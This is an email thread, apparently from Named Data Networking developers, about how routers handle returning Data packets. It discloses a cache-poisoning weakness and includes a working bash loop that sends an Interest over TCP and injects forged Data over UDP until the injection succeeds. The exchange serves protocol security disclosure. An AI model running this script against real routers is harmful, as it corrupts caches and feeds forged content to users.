<div dir="ltr">Hi Lixia<br><div class="gmail_extra"><br><div class="gmail_quote"><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex"><div style="word-wrap:break-word"><div><span class="gmail-"><blockquote type="cite"><div><div dir="auto"><div><div class="gmail_extra"><br><div class="gmail_quote"><blockquote class="gmail-m_6632320802122234055quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex"><div dir="ltr"><div><div>what happens to the PIT entry when a data packet comes back to NFD through the same face that the interest came through?</div></div></div></blockquote></div></div></div><div dir="auto">The Data packet would satisfy the PIT entry. A node does not care whether an a Interest was forwarded out of the face receiving Data.</div><div dir="auto">Cough cough: you can use this property to for cache poisoning, by sending an Interest followed by a Data satisfying that Interest. In reality it works if you timed your packets right.</div></div></div></blockquote><div><br></div></span>But how does the data packet get into the router?</div><div>- the face is wireless and the attacker sitting next to the router?</div><div><div><div dir="auto"><div dir="auto"><br></div></div></div></div></div></blockquote><div>Yes, the attacker must be one NDN-hop away from the victim router. Today's NDN testbed easily fulfills this property.</div><div><br></div><div>The following script sends Interest to a testbed router over TCP, and sends Data to the same router over UDP. It loops until injection succeeds. In reality, it can succeed within 10 iterations.</div><div><br></div><div><div><font face="monospace, monospace">#!/bin/bash</font></div><div><font face="monospace, monospace">ROUTER=$1</font></div><div><font face="monospace, monospace">NAME=$2</font></div><div><font face="monospace, monospace">PKT=$3</font></div><div><font face="monospace, monospace"><br></font></div><div><font face="monospace, monospace">export NDN_TRANSPORT=tcp4://$ROUTER:6363</font></div><div><font face="monospace, monospace"><br></font></div><div><font face="monospace, monospace">while ! ndnpeek -v -l 2000 $NAME; do</font></div><div><font face="monospace, monospace">  ndnpeek -v -l 8000 $NAME &</font></div><div><font face="monospace, monospace">  sleep 0.2</font></div><div><font face="monospace, monospace">  cat $PKT >/dev/udp/$ROUTER/6363</font></div><div><font face="monospace, monospace">  wait</font></div><div><font face="monospace, monospace">done</font></div></div><div><br></div><div><br></div><div>Yours, Junxiao </div></div></div></div>